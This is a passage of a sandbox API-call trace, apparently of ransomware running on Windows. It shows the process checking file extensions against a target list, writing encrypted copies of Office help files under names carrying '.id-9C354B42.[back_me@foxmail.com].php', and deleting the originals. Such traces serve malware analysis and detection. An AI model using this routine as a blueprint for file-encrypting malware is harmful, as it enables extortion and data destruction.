Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.616] lstrlenW (lpString=".doc") returned 4 [0040.616] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString=".docx") returned 5 [0040.616] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.616] lstrlenW (lpString=".pdf") returned 4 [0040.616] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString=".xls") returned 4 [0040.616] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString=".xlsx") returned 5 [0040.616] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.616] lstrlenW (lpString=".ppt") returned 4 [0040.616] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.616] lstrlenW (lpString=".zip") returned 4 [0040.616] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.616] lstrlenW (lpString=".rar") returned 4 [0040.616] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString=".bz2") returned 4 [0040.616] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString=".7z") returned 3 [0040.616] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.616] lstrlenW (lpString=".dbf") returned 4 [0040.616] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.617] lstrlenW (lpString=".1cd") returned 4 [0040.617] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 102 [0040.617] lstrlenW (lpString=".jpg") returned 4 [0040.617] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.617] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0040.617] lstrlenW (lpString="PSCONFIG.CHM") returned 12 [0040.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.618] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=37689) returned 1 [0040.618] CloseHandle (hObject=0x1a0) returned 1 [0040.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 0x20 [0040.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.618] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.618] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0040.618] GetLastError () returned 0x0 [0040.618] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x9339, lpOverlapped=0x0) returned 1 [0040.621] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x9340, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x9340, lpOverlapped=0x0) returned 1 [0040.622] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.622] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0040.622] SetEndOfFile (hFile=0x198) returned 1 [0040.622] CloseHandle (hObject=0x198) returned 1 [0040.623] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.623] SetEndOfFile (hFile=0x1a0) returned 1 [0040.624] CloseHandle (hObject=0x1a0) returned 1 [0040.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.625] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm")) returned 1 [0040.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.625] lstrlenW (lpString=".doc") returned 4 [0040.625] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.625] lstrlenW (lpString=".docx") returned 5 [0040.625] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0040.625] lstrlenW (lpString=".pdf") returned 4 [0040.625] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.625] lstrlenW (lpString=".xls") returned 4 [0040.625] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.625] lstrlenW (lpString=".xlsx") returned 5 [0040.625] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0040.625] lstrlenW (lpString=".ppt") returned 4 [0040.625] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.625] lstrlenW (lpString=".zip") returned 4 [0040.625] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.625] lstrlenW (lpString=".rar") returned 4 [0040.625] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString=".bz2") returned 4 [0040.626] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.626] lstrlenW (lpString=".7z") returned 3 [0040.626] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.626] lstrlenW (lpString=".dbf") returned 4 [0040.626] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.626] lstrlenW (lpString=".1cd") returned 4 [0040.626] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.626] lstrlenW (lpString=".jpg") returned 4 [0040.626] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.626] lstrlenW (lpString=".doc") returned 4 [0040.626] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString=".docx") returned 5 [0040.626] lstrcmpiW (lpString1=".docx", lpString2="G.CHM") returned -1 [0040.626] lstrlenW (lpString=".pdf") returned 4 [0040.626] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString=".xls") returned 4 [0040.626] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString=".xlsx") returned 5 [0040.626] lstrcmpiW (lpString1=".xlsx", lpString2="G.CHM") returned -1 [0040.626] lstrlenW (lpString=".ppt") returned 4 [0040.626] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.626] lstrlenW (lpString=".zip") returned 4 [0040.626] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.626] lstrlenW (lpString=".rar") returned 4 [0040.626] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.627] lstrlenW (lpString=".bz2") returned 4 [0040.627] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.627] lstrlenW (lpString=".7z") returned 3 [0040.627] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.627] lstrlenW (lpString=".dbf") returned 4 [0040.627] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.627] lstrlenW (lpString=".1cd") returned 4 [0040.627] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.627] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 105 [0040.627] lstrlenW (lpString=".jpg") returned 4 [0040.627] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.627] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0040.627] lstrlenW (lpString="PSS10O.CHM") returned 10 [0040.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.627] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=26929) returned 1 [0040.627] CloseHandle (hObject=0x1a0) returned 1 [0040.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 0x20 [0040.628] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.628] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.628] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0040.628] GetLastError () returned 0x0 [0040.628] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x6931, lpOverlapped=0x0) returned 1 [0040.630] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x6940, lpOverlapped=0x0) returned 1 [0040.631] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.631] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0040.631] SetEndOfFile (hFile=0x198) returned 1 [0040.631] CloseHandle (hObject=0x198) returned 1 [0040.632] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.632] SetEndOfFile (hFile=0x1a0) returned 1 [0040.633] CloseHandle (hObject=0x1a0) returned 1 [0040.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.633] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.634] lstrlenW (lpString=".doc") returned 4 [0040.634] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.634] lstrlenW (lpString=".docx") returned 5 [0040.634] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0040.634] lstrlenW (lpString=".pdf") returned 4 [0040.634] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.634] lstrlenW (lpString=".xls") returned 4 [0040.634] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.634] lstrlenW (lpString=".xlsx") returned 5 [0040.634] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0040.634] lstrlenW (lpString=".ppt") returned 4 [0040.634] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.634] lstrlenW (lpString=".zip") returned 4 [0040.634] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.634] lstrlenW (lpString=".rar") returned 4 [0040.634] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.634] lstrlenW (lpString=".bz2") returned 4 [0040.634] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.634] lstrlenW (lpString=".7z") returned 3 [0040.634] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.634] lstrlenW (lpString=".dbf") returned 4 [0040.634] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.634] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.635] lstrlenW (lpString=".1cd") returned 4 [0040.635] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.635] lstrlenW (lpString=".jpg") returned 4 [0040.635] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.635] lstrlenW (lpString=".doc") returned 4 [0040.635] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString=".docx") returned 5 [0040.635] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0040.635] lstrlenW (lpString=".pdf") returned 4 [0040.635] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString=".xls") returned 4 [0040.635] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString=".xlsx") returned 5 [0040.635] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0040.635] lstrlenW (lpString=".ppt") returned 4 [0040.635] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.635] lstrlenW (lpString=".zip") returned 4 [0040.635] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString=".rar") returned 4 [0040.635] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString=".bz2") returned 4 [0040.635] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.635] lstrlenW (lpString=".7z") returned 3 [0040.635] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.635] lstrlenW (lpString=".dbf") returned 4 [0040.635] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.636] lstrlenW (lpString=".1cd") returned 4 [0040.636] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.636] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.636] lstrlenW (lpString=".jpg") returned 4 [0040.636] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.636] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0040.636] lstrlenW (lpString="PSS10R.CHM") returned 10 [0040.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.637] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=27195) returned 1 [0040.637] CloseHandle (hObject=0x1a0) returned 1 [0040.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 0x20 [0040.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0040.637] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.637] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0040.637] GetLastError () returned 0x0 [0040.638] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x6a3b, lpOverlapped=0x0) returned 1 [0040.639] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x6a40, lpOverlapped=0x0) returned 1 [0040.641] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.641] WriteFile (in: hFile=0x198, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0040.641] SetEndOfFile (hFile=0x198) returned 1 [0040.641] CloseHandle (hObject=0x198) returned 1 [0040.642] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.642] SetEndOfFile (hFile=0x1a0) returned 1 [0040.643] CloseHandle (hObject=0x1a0) returned 1 [0040.643] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.643] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 1 [0040.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.643] lstrlenW (lpString=".doc") returned 4 [0040.643] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.643] lstrlenW (lpString=".docx") returned 5 [0040.644] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0040.644] lstrlenW (lpString=".pdf") returned 4 [0040.644] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString=".xls") returned 4 [0040.644] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString=".xlsx") returned 5 [0040.644] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0040.644] lstrlenW (lpString=".ppt") returned 4 [0040.644] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.644] 